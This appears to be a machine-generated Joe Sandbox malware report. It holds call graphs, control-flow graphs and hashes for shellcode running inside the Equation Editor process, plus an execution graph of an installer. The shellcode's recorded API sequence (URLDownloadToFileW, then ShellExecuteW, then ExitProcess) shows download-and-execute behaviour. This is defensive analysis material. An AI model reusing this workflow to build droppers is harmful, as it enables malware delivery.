2916->2918 2918->2917 2919 353048b ExitProcess 2918->2919 2232 35303ab 2233 35303ad 2232->2233 2236 35303c0 LoadLibraryW 2233->2236 2237 35303c2 2236->2237 2252 35303da 2237->2252 2239 353043c 2275 3530463 2239->2275 2241 35303eb URLDownloadToFileW 2266 353044e 2241->2266 2246 353045d ShellExecuteW 2281 3530488 2246->2281 2249 35303b2 2250 353047c 2250->2249 2251 353048b ExitProcess 2250->2251 2253 35303dd 2252->2253 2254 3530435 8 API calls 2253->2254 2255 35303eb URLDownloadToFileW 2254->2255 2257 353044e 5 API calls 2255->2257 2258 353043e 2257->2258 2259 3530463 3 API calls 2258->2259 2260 3530455 2259->2260 2261 353045d ShellExecuteW 2260->2261 2263 35303c7 2260->2263 2262 3530488 ExitProcess 2261->2262 2264 353047c 2262->2264 2263->2239 2263->2241 2283 3530435 URLDownloadToFileW 2263->2283 2264->2263 2265 353048b ExitProcess 2264->2265 2267 3530450 2266->2267 2268 3530455 2267->2268 2269 3530463 3 API calls 2267->2269 2270 353045d ShellExecuteW 2268->2270 2272 35304c2 2268->2272 2269->2268 2271 3530488 ExitProcess 2270->2271 2273 353047c 2271->2273 2272->2239 2273->2272 2274 353048b ExitProcess 2273->2274 2276 3530466 ShellExecuteW 2275->2276 2277 353047c 2276->2277 2278 3530488 ExitProcess 2276->2278 2279 3530455 2277->2279 2280 353048b ExitProcess 2277->2280 2278->2277 2279->2246 2279->2249 2282 353048b ExitProcess 2281->2282 2284 353043e 2283->2284 2285 353044e 5 API calls 2283->2285 2286 3530463 3 API calls 2284->2286 2285->2284 2287 3530455 2286->2287 2288 353045d ShellExecuteW 2287->2288 2291 35304c2 2287->2291 2289 3530488 ExitProcess 2288->2289 2290 353047c 2289->2290 2290->2291 2292 353048b ExitProcess 2290->2292 2291->2241

                                                  Callgraph

                                                  • Executed
                                                  • Not Executed
                                                  • Opacity -> Relevance
                                                  • Disassembly available
                                                  callgraph 0 Function_03530193 6 Function_035303DA 0->6 10 Function_03530342 0->10 17 Function_03530488 0->17 20 Function_0353044E 0->20 21 Function_0353030D 0->21 25 Function_03530435 0->25 27 Function_03530463 0->27 31 Function_03530326 0->31 35 Function_035303AB 0->35 1 Function_03530091 1->6 1->10 1->17 1->20 1->21 1->25 1->27 1->31 1->35 2 Function_03530110 2->6 2->10 2->17 2->20 2->21 2->25 2->27 2->31 2->35 3 Function_035300D7 3->6 3->10 3->17 3->20 3->21 3->25 3->27 3->31 3->35 4 Function_03530116 4->6 4->10 4->17 4->20 4->21 4->25 4->27 4->31 4->35 5 Function_0353011B 5->6 5->10 5->17 5->20 5->21 5->25 5->27 5->31 5->35 6->17 6->20 6->25 6->27 7 Function_0353015E 7->6 7->10 7->17 7->20 7->21 7->25 7->27 7->31 7->35 8 Function_035300DC 8->6 8->10 8->17 8->20 8->21 8->25 8->27 8->31 8->35 9 Function_03530143 9->6 9->10 9->17 9->20 9->21 9->25 9->27 9->31 9->35 10->6 10->17 18 Function_03530508 10->18 10->20 10->25 10->27 10->35 37 Function_03530369 10->37 11 Function_03530101 11->6 11->10 11->17 11->20 11->21 11->25 11->27 11->31 11->35 12 Function_035303C0 12->6 12->17 12->20 12->25 12->27 13 Function_03530000 13->1 14 Function_035301C6 14->6 14->10 14->17 14->20 14->21 14->25 14->27 14->31 14->35 15 Function_035300CB 15->6 15->10 15->17 15->20 15->21 15->25 15->27 15->31 15->35 16 Function_0353014B 16->6 16->10 16->17 16->20 16->21 16->25 16->27 16->31 16->35 19 Function_0353048F 24 Function_035304B7 19->24 20->17 20->27 21->6 21->10 21->17 21->20 21->25 21->27 21->31 21->35 22 Function_03530073 22->6 22->10 22->17 22->20 22->21 22->25 22->27 22->31 22->35 23 Function_035300F2 23->6 23->10 23->17 23->20 23->21 23->25 23->27 23->31 23->35 25->17 25->20 25->27 26 Function_035300FD 26->6 26->10 26->17 26->20 26->21 26->25 26->27 26->31 26->35 27->17 28 Function_035302E3 28->6 28->10 28->17 28->20 28->21 28->25 28->27 28->31 28->35 29 Function_035300A1 29->6 29->10 29->17 29->20 29->21 29->25 29->27 29->31 29->35 30 Function_03530160 30->6 30->10 30->17 30->20 30->21 30->25 30->27 30->31 30->35 31->6 31->10 31->17 31->18 31->20 31->25 31->27 31->35 32 Function_03530126 32->6 32->10 32->17 32->20 32->21 32->25 32->27 32->31 32->35 33 Function_035300A5 33->6 33->10 33->17 33->20 33->21 33->25 33->27 33->31 33->35 34 Function_035300AB 34->6 34->10 34->17 34->20 34->21 34->25 34->27 34->31 34->35 35->12 36 Function_0353026B 37->35 38 Function_03530169 38->6 38->10 38->17 38->20 38->21 38->25 38->27 38->31 38->35 39 Function_035300AD 39->6 39->10 39->17 39->20 39->21 39->25 39->27 39->31 39->35 40 Function_035300ED

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 0 35303c0-35303cc LoadLibraryW call 35303da 5 35303ce-35303e5 0->5 6 353043c-353043e 0->6 9 35303eb-3530439 URLDownloadToFileW call 353044e 5->9 10 35303e6 call 3530435 5->10 8 3530440-353045b call 3530463 6->8 15 35304c2-35304ce 8->15 16 353045d-353047f ShellExecuteW call 3530488 8->16 22 353043e 9->22 10->9 17 35304d1 15->17 16->17 31 3530481 16->31 20 35304d3-35304d7 17->20 21 35304d9-35304dd 17->21 20->21 24 35304e5-35304ec 20->24 25 35304f2-35304f4 21->25 26 35304df-35304e3 21->26 22->8 28 35304f0 24->28 29 35304ee 24->29 30 3530504-3530505 25->30 26->24 26->25 28->25 32 35304f6-35304ff 28->32 29->25 31->25 33 3530483-353048d ExitProcess 31->33 36 3530501 32->36 37 35304c8-35304cb 32->37 36->30 37->32 39 35304cd 37->39 39->17
                                                  APIs
                                                  • LoadLibraryW.KERNEL32(035303B2), ref: 035303C0
                                                    • Part of subcall function 035303DA: URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437
                                                    • Part of subcall function 035303DA: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
                                                    • Part of subcall function 035303DA: ExitProcess.KERNEL32(00000000), ref: 0353048D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileLibraryLoadProcessShell
                                                  • String ID:
                                                  • API String ID: 2508257586-0
                                                  • Opcode ID: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
                                                  • Instruction ID: f36e6e4c4dbd4b3bdc94c687ca5946bfbaf5a0228bd302cb1d2c49939bb0d039
                                                  • Opcode Fuzzy Hash: 0d2f53907d51cb28d93c57463c93cae89cd214bbc9b63121599eb68b3297a9d5
                                                  • Instruction Fuzzy Hash: 9621689294C3C22FDB139B302C6AB65BF246F63104F5989CEE4C30E4E3E2989601C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 40 3530342-3530350 call 3530508 call 3530369 45 35303c2-35303c9 call 35303da 40->45 46 3530352-3530357 40->46 50 35303ca-35303cc 45->50 46->45 47 3530359 46->47 49 353035b-353035f 47->49 47->50 54 3530361 49->54 55 35303b4-35303be 49->55 52 35303ce-35303d4 50->52 53 353043c-353043e 50->53 57 35303d5-35303e5 52->57 59 3530440-353045b call 3530463 53->59 56 3530363-35303b1 call 35303ab 54->56 54->57 56->55 60 35303eb-353043e URLDownloadToFileW call 353044e 57->60 61 35303e6 call 3530435 57->61 68 35304c2-35304ce 59->68 69 353045d-353047f ShellExecuteW call 3530488 59->69 60->59 61->60 71 35304d1 68->71 69->71 87 3530481 69->87 75 35304d3-35304d7 71->75 76 35304d9-35304dd 71->76 75->76 80 35304e5-35304ec 75->80 81 35304f2-35304f4 76->81 82 35304df-35304e3 76->82 84 35304f0 80->84 85 35304ee 80->85 86 3530504-3530505 81->86 82->80 82->81 84->81 88 35304f6-35304ff 84->88 85->81 87->81 89 3530483-353048d ExitProcess 87->89 92 3530501 88->92 93 35304c8-35304cb 88->93 92->86 93->88 95 35304cd 93->95 95->71
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437
                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
                                                  • ExitProcess.KERNEL32(00000000), ref: 0353048D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
                                                  • Instruction ID: f00cef73945bf4f10836eac66c1e54f55740cdf1b146c1bf1aede8f7453766a7
                                                  • Opcode Fuzzy Hash: e1c00e028d7abc4718b8ca59f0e7e545718e9c2cc18295552816babf3ef35b43
                                                  • Instruction Fuzzy Hash: B341679680D3C12FDB13EB302D6A655BF247F63104F5D89CE94C74A4E3E2989205C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 96 35303da-353045b call 3530435 URLDownloadToFileW call 353044e call 3530463 107 35304c2-35304ce 96->107 108 353045d-353047f ShellExecuteW call 3530488 96->108 109 35304d1 107->109 108->109 121 3530481 108->121 111 35304d3-35304d7 109->111 112 35304d9-35304dd 109->112 111->112 114 35304e5-35304ec 111->114 115 35304f2-35304f4 112->115 116 35304df-35304e3 112->116 118 35304f0 114->118 119 35304ee 114->119 120 3530504-3530505 115->120 116->114 116->115 118->115 122 35304f6-35304ff 118->122 119->115 121->115 123 3530483-353048d ExitProcess 121->123 126 3530501 122->126 127 35304c8-35304cb 122->127 126->120 127->122 129 35304cd 127->129 129->109
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
                                                  • Instruction ID: a24d948578298ef43d0d00ed053c09677299af4c266555960eca302f8201e690
                                                  • Opcode Fuzzy Hash: a91284640ddb484cc1e159123733978af5aff9974feb098c9e5f4e02341bcca2
                                                  • Instruction Fuzzy Hash: 1C21349294C3C22FDB139B301C6AB55BF642F63104F5989CEE4C74E4E3E2A88540C767
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 130 3530435-3530437 URLDownloadToFileW 131 353043e-353045b call 3530463 130->131 132 3530439 call 353044e 130->132 136 35304c2-35304ce 131->136 137 353045d-353047f ShellExecuteW call 3530488 131->137 132->131 138 35304d1 136->138 137->138 150 3530481 137->150 140 35304d3-35304d7 138->140 141 35304d9-35304dd 138->141 140->141 143 35304e5-35304ec 140->143 144 35304f2-35304f4 141->144 145 35304df-35304e3 141->145 147 35304f0 143->147 148 35304ee 143->148 149 3530504-3530505 144->149 145->143 145->144 147->144 151 35304f6-35304ff 147->151 148->144 150->144 152 3530483-353048d ExitProcess 150->152 155 3530501 151->155 156 35304c8-35304cb 151->156 155->149 156->151 158 35304cd 156->158 158->138
                                                  APIs
                                                  • URLDownloadToFileW.URLMON(00000000,035303EB,?,00000000,00000000), ref: 03530437
                                                    • Part of subcall function 0353044E: ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
                                                    • Part of subcall function 0353044E: ExitProcess.KERNEL32(00000000), ref: 0353048D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: DownloadExecuteExitFileProcessShell
                                                  • String ID:
                                                  • API String ID: 3584569557-0
                                                  • Opcode ID: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction ID: e3c0fe2d046e96a1c3e9cd01705f4912736346ae8bedc488223c2bb06292bafa
                                                  • Opcode Fuzzy Hash: 2ac2e785a5df96b5b1d2b6d05b07d367621e1ab0833f3c674eb7a3d1e14328db
                                                  • Instruction Fuzzy Hash: 8BF0276068C3403AEA52E7746C8AF696F24BF93704F14088DB1474F4F3E5D0C600C22A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 159 3530463-3530475 ShellExecuteW 161 353047c-353047f 159->161 162 3530477 call 3530488 159->162 164 35304d1 161->164 165 3530481 161->165 162->161 166 35304d3-35304d7 164->166 167 35304d9-35304dd 164->167 168 3530483-353048d ExitProcess 165->168 169 35304f2-35304f4 165->169 166->167 171 35304e5-35304ec 166->171 167->169 172 35304df-35304e3 167->172 173 3530504-3530505 169->173 174 35304f0 171->174 175 35304ee 171->175 172->169 172->171 174->169 177 35304f6-35304ff 174->177 175->169 179 3530501 177->179 180 35304c8-35304cb 177->180 179->173 180->177 181 35304cd 180->181 181->164
                                                  APIs
                                                  • ShellExecuteW.SHELL32(00000000,00000000,?,00000000,00000000,00000001), ref: 03530475
                                                    • Part of subcall function 03530488: ExitProcess.KERNEL32(00000000), ref: 0353048D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction ID: 1c0f71aac2412c7f681871b371a757328b696e03a8378cfdb6ccedc4c94d225a
                                                  • Opcode Fuzzy Hash: 9bb4a9efaea7c07eca078e7354966bed14a700fa2dbfda34c55d40211f488600
                                                  • Instruction Fuzzy Hash: F3014994A8431221DB30E628A845BBAAB50BB53710FCC8C4BA983070F6D19483C3863A
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 182 353044e-3530450 184 3530455-353045b 182->184 185 3530450 call 3530463 182->185 186 35304c2-35304ce 184->186 187 353045d-353047f ShellExecuteW call 3530488 184->187 185->184 188 35304d1 186->188 187->188 200 3530481 187->200 190 35304d3-35304d7 188->190 191 35304d9-35304dd 188->191 190->191 193 35304e5-35304ec 190->193 194 35304f2-35304f4 191->194 195 35304df-35304e3 191->195 197 35304f0 193->197 198 35304ee 193->198 199 3530504-3530505 194->199 195->193 195->194 197->194 201 35304f6-35304ff 197->201 198->194 200->194 202 3530483-353048d ExitProcess 200->202 205 3530501 201->205 206 35304c8-35304cb 201->206 205->199 206->201 208 35304cd 206->208 208->188
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExecuteExitProcessShell
                                                  • String ID:
                                                  • API String ID: 1124553745-0
                                                  • Opcode ID: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction ID: 65744602e661bdc7a0f6d7ccb14483875109863d90565b7dbdd9094b52328317
                                                  • Opcode Fuzzy Hash: 86e204669779fcf6b1d289fc5e1d83ca539377395524096db536a032bfc48ab3
                                                  • Instruction Fuzzy Hash: 3201492068830131E771E2286C84FAEAB90BB93714F98885AE4530B0F2D2848743C23D
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 209 3530488-353048d ExitProcess
                                                  APIs
                                                  • ExitProcess.KERNEL32(00000000), ref: 0353048D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction ID: f49c04242a7a61e974833cf8218924656bc711991e28e6f13ed51e74029fe7d2
                                                  • Opcode Fuzzy Hash: 288fe55cd219b45af00edd1f2cff87e2581c67c70a4523920e313d1c8e5ebd5b
                                                  • Instruction Fuzzy Hash:
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 211 353048f-353049a GetPEB 212 353049d-35304ae call 35304b7 211->212 215 35304b0-35304b4 212->215
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID:
                                                  • String ID:
                                                  • API String ID:
                                                  • Opcode ID: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction ID: 516b4e4f1656728d2c709580eb1414260d604a57b43e2db5760832ebf6ddb1ac
                                                  • Opcode Fuzzy Hash: 15c3e4776a16804bb5212a09f03411bf1d00a4b4976dbaad078e0c99fd6b82f5
                                                  • Instruction Fuzzy Hash: 9DD05231202602CFC304EF04EA80E13F37AFFD8210B28C268E0014BB69C330E892CA90
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  • Executed
                                                  • Not Executed
                                                  control_flow_graph 216 353030d-3530312 ExitProcess 217 3530319-353032c 216->217 218 3530314 call 3530326 216->218 219 3530333-3530334 217->219 220 353032e call 3530342 217->220 218->217 221 3530387-35303b1 219->221 222 3530337-353033f 219->222 220->219 225 35303b4-35303be 221->225 222->225 228 3530341-3530350 222->228 229 35303c2-35303c9 call 35303da 228->229 230 3530352-3530357 228->230 234 35303ca-35303cc 229->234 230->229 231 3530359 230->231 233 353035b-353035f 231->233 231->234 233->225 238 3530361 233->238 236 35303ce-35303d4 234->236 237 353043c-353043e 234->237 240 35303d5-35303e5 236->240 241 3530440-353045b call 3530463 237->241 239 3530363-3530384 call 35303ab 238->239 238->240 239->221 242 35303eb-353043e URLDownloadToFileW call 353044e 240->242 243 35303e6 call 3530435 240->243 250 35304c2-35304ce 241->250 251 353045d-353047f ShellExecuteW call 3530488 241->251 242->241 243->242 253 35304d1 250->253 251->253 267 3530481 251->267 256 35304d3-35304d7 253->256 257 35304d9-35304dd 253->257 256->257 260 35304e5-35304ec 256->260 261 35304f2-35304f4 257->261 262 35304df-35304e3 257->262 264 35304f0 260->264 265 35304ee 260->265 266 3530504-3530505 261->266 262->260 262->261 264->261 268 35304f6-35304ff 264->268 265->261 267->261 269 3530483-353048d ExitProcess 267->269 272 3530501 268->272 273 35304c8-35304cb 268->273 272->266 273->268 275 35304cd 273->275 275->253
                                                  APIs
                                                  • ExitProcess.KERNEL32(035302FB), ref: 0353030D
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.413534624.0000000003530000.00000004.00000020.00020000.00000000.sdmp, Offset: 03530000, based on PE: false
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_3530000_EQNEDT32.jbxd
                                                  Similarity
                                                  • API ID: ExitProcess
                                                  • String ID:
                                                  • API String ID: 621844428-0
                                                  • Opcode ID: 450c007dea0f16e053dc5b21e30fc40f182e6e70ba9728136df8b84d78ea75f8
                                                  • Instruction ID: ccdb23a1431163f06cc85e3ecbbee51df34222a83e6d0125e68d60d7d4eecac6
                                                  • Opcode Fuzzy Hash: 450c007dea0f16e053dc5b21e30fc40f182e6e70ba9728136df8b84d78ea75f8
                                                  • Instruction Fuzzy Hash: 16218C9680E7C45FD712E7302EAA195BF20BE53404B2C85CF85C64F1F3E265960AD397
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Execution Graph

                                                  Execution Coverage:21.5%
                                                  Dynamic/Decrypted Code Coverage:14%
                                                  Signature Coverage:17.3%
                                                  Total number of Nodes:1533
                                                  Total number of Limit Nodes:50
                                                  execution_graph 5207 401d41 5208 401d54 GetDlgItem 5207->5208 5209 401d47 5207->5209 5211 401d4e 5208->5211 5210 402b0a 17 API calls 5209->5210 5210->5211 5212 401d8f GetClientRect LoadImageA SendMessageA 5211->5212 5214 402b2c 17 API calls 5211->5214 5215 4029b8 5212->5215 5216 401deb 5212->5216 5214->5212 5216->5215 5217 401df3 DeleteObject 5216->5217 5217->5215 5218 72be103d 5221 72be101b 5218->5221 5228 72be14bb 5221->5228 5223 72be1020 5224 72be1027 GlobalAlloc 5223->5224 5225 72be1024 5223->5225 5224->5225 5226 72be14e2 3 API calls 5225->5226 5227 72be103b 5226->5227 5230 72be14c1 5228->5230 5229 72be14c7 5229->5223 5230->5229 5231 72be14d3 GlobalFree 5230->5231 5231->5223 4054 401746 4060 402b2c 4054->4060 4058 401754 4059 405ba2 2 API calls 4058->4059 4059->4058 4061 402b38 4060->4061 4070 405ffc 4061->4070 4064 40174d 4066 405ba2 4064->4066 4067 405bad GetTickCount GetTempFileNameA 4066->4067 4068 405bde 4067->4068 4069 405bda 4067->4069 4068->4058 4069->4067 4069->4068 4075 406009 4070->4075 4071 40622b 4072 402b59 4071->4072 4103 405fda lstrcpynA 4071->4103 4072->4064 4087 406244 4072->4087 4074 406205 lstrlenA 4074->4075 4075->4071 4075->4074 4078 405ffc 10 API calls 4075->4078 4080 406121 GetSystemDirectoryA 4075->4080 4081 406134 GetWindowsDirectoryA 4075->4081 4082 406244 5 API calls 4075->4082 4083 405ffc 10 API calls 4075->4083 4084 4061ae lstrcatA 4075->4084 4085 406168 SHGetSpecialFolderLocation 4075->4085 4096 405ec1 4075->4096 4101 405f38 wsprintfA 4075->4101 4102 405fda lstrcpynA 4075->4102 4078->4074 4080->4075 4081->4075 4082->4075 4083->4075 4084->4075 4085->4075 4086 406180 SHGetPathFromIDListA CoTaskMemFree 4085->4086 4086->4075 4093 406250 4087->4093 4088 4062b8 4089 4062bc CharPrevA 4088->4089 4092 4062d7 4088->4092 4089->4088 4090 4062ad CharNextA 4090->4088 4090->4093 4092->4064 4093->4088 4093->4090 4094 40629b CharNextA 4093->4094 4095 4062a8 CharNextA 4093->4095 4108 40599d 4093->4108 4094->4093 4095->4090 4104 405e60 4096->4104 4099 405f24 4099->4075 4100 405ef5 RegQueryValueExA RegCloseKey 4100->4099 4101->4075 4102->4075 4103->4072 4105 405e6f 4104->4105 4106 405e73 4105->4106 4107 405e78 RegOpenKeyExA 4105->4107 4106->4099 4106->4100 4107->4106 4109 4059a3 4108->4109 4110 4059b6 4109->4110 4111 4059a9 CharNextA 4109->4111 4110->4093 4111->4109 5232 72be1638 5233 72be1667 5232->5233 5234 72be1a98 18 API calls 5233->5234 5235 72be166e 5234->5235 5236 72be1675 5235->5236 5237 72be1681 5235->5237 5238 72be1266 2 API calls 5236->5238 5239 72be168b 5237->5239 5240 72be16a8 5237->5240 5243 72be167f 5238->5243 5244 72be14e2 3 API calls 5239->5244 5241 72be16ae 5240->5241 5242 72be16d2 5240->5242 5245 72be1559 3 API calls 5241->5245 5246 72be14e2 3 API calls 5242->5246 5247 72be1690 5244->5247 5248 72be16b3 5245->5248 5246->5243 5249 72be1559 3 API calls 5247->5249 5250 72be1266 2 API calls 5248->5250 5251 72be1696 5249->5251 5252 72be16b9 GlobalFree 5250->5252 5253 72be1266 2 API calls 5251->5253 5252->5243 5254 72be16cd GlobalFree 5252->5254 5255 72be169c GlobalFree 5253->5255 5254->5243 5255->5243 5256 401947 5257 402b2c 17 API calls 5256->5257 5258 40194e lstrlenA 5257->5258 5259 4025e4 5258->5259 5260 401fc8 5261 402b2c 17 API calls 5260->5261 5262 401fcf 5261->5262 5263 406372 5 API calls 5262->5263 5264 401fde 5263->5264 5265 401ff6 GlobalAlloc 5264->5265 5268 40205e 5264->5268 5266 40200a 5265->5266 5265->5268 5267 406372 5 API calls 5266->5267 5269 402011 5267->5269 5270 406372 5 API calls 5269->5270 5271 40201b 5270->5271 5271->5268 5275 405f38 wsprintfA 5271->5275 5273 402052 5276 405f38 wsprintfA 5273->5276 5275->5273 5276->5268 5277 4025c8 5278 402b2c 17 API calls 5277->5278 5279 4025cf 5278->5279 5282 405b73 GetFileAttributesA CreateFileA 5279->5282 5281 4025db 5282->5281 5283 72be1837 5285 72be185a 5283->5285 5284 72be189c __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z __allrem 5287 72be1266 2 API calls 5284->5287 5285->5284 5286 72be188a GlobalFree 5285->5286 5286->5284 5288 72be1a1e GlobalFree GlobalFree 5287->5288 4137 4014ca 4140 405101 4137->4140 4141 4014d1 4140->4141 4142 40511c 4140->4142 4143 405139 lstrlenA 4142->4143 4144 405ffc 17 API calls 4142->4144 4145 405162 4143->4145 4146 405147 lstrlenA 4143->4146 4144->4143 4148 405175 4145->4148 4149 405168 SetWindowTextA 4145->4149 4146->4141 4147 405159 lstrcatA 4146->4147 4147->4145 4148->4141 4150 40517b SendMessageA SendMessageA SendMessageA 4148->4150 4149->4148 4150->4141 5296 40484b 5297 404877 5296->5297 5298 40485b 5296->5298 5300 4048aa 5297->5300 5301 40487d SHGetPathFromIDListA 5297->5301 5307 4056da GetDlgItemTextA 5298->5307 5303 404894 SendMessageA 5301->5303 5304 40488d 5301->5304 5302 404868 SendMessageA 5302->5297 5303->5300 5305 40140b 2 API calls 5304->5305 5305->5303 5307->5302 4151 40254c 4162 402b6c 4151->4162 4154 402b0a 17 API calls 4155 40255f 4154->4155 4156 402586 RegEnumValueA 4155->4156 4157 40257a RegEnumKeyA 4155->4157 4160 402783 4155->4160 4158 4025a2 RegCloseKey 4156->4158 4159 40259b 4156->4159 4157->4158 4158->4160 4159->4158 4163 402b2c 17 API calls 4162->4163 4164 402b83 4163->4164 4165 405e60 RegOpenKeyExA 4164->4165 4166 402556 4165->4166 4166->4154 4175 4041d3 4176 4041e9 4175->4176 4185 4042f5 4175->4185 4210 404068 4176->4210 4177 404364 4179 40442e 4177->4179 4180 40436e GetDlgItem 4177->4180 4219 4040cf 4179->4219 4183 404384 4180->4183 4184 4043ec 4180->4184 4182 40423f 4186 404068 18 API calls 4182->4186 4183->4184 4191 4043aa SendMessageA LoadCursorA SetCursor 4183->4191 4184->4179 4192 4043fe 4184->4192 4185->4177 4185->4179 4188 404339 GetDlgItem SendMessageA 4185->4188 4189 40424c CheckDlgButton 4186->4189 4215 40408a KiUserCallbackDispatcher 4188->4215 4213 40408a KiUserCallbackDispatcher 4189->4213 4190 404429 4207 404477 4191->4207 4196 404404 SendMessageA 4192->4196 4197 404415 4192->4197 4196->4197 4197->4190 4202 40441b SendMessageA 4197->4202 4198 40435f 4216 404453 4198->4216 4200 40426a GetDlgItem 4214 40409d SendMessageA 4200->4214 4202->4190 4204 404280 SendMessageA 4205 4042a7 SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 4204->4205 4206 40429e GetSysColor 4204->4206 4205->4190 4206->4205 4233 4056bc ShellExecuteExA 4207->4233 4209 4043dd LoadCursorA SetCursor 4209->4184 4211 405ffc 17 API calls 4210->4211 4212 404073 SetDlgItemTextA 4211->4212 4212->4182 4213->4200 4214->4204 4215->4198 4217 404461 4216->4217 4218 404466 SendMessageA 4216->4218 4217->4218 4218->4177 4220 404192 4219->4220 4221 4040e7 GetWindowLongA 4219->4221 4220->4190 4221->4220 4222 4040fc 4221->4222 4222->4220 4223 404129 GetSysColor 4222->4223 4224 40412c 4222->4224 4223->4224 4225 404132 SetTextColor 4224->4225 4226 40413c SetBkMode 4224->4226 4225->4226 4227 404154 GetSysColor 4226->4227 4228 40415a 4226->4228 4227->4228 4229 404161 SetBkColor 4228->4229 4230 40416b 4228->4230 4229->4230 4230->4220 4231 404185 CreateBrushIndirect 4230->4231 4232 40417e DeleteObject 4230->4232 4231->4220 4232->4231 4233->4209 5308 4014d6 5309 402b0a 17 API calls 5308->5309 5310 4014dc Sleep 5309->5310 5312 4029b8 5310->5312 4324 401759 4325 402b2c 17 API calls 4324->4325 4326 401760 4325->4326 4327 401786 4326->4327 4328 40177e 4326->4328 4386 405fda lstrcpynA 4327->4386 4385 405fda lstrcpynA 4328->4385 4331 401784 4335 406244 5 API calls 4331->4335 4332 401791 4387 405972 lstrlenA CharPrevA 4332->4387 4361 4017a3 4335->4361 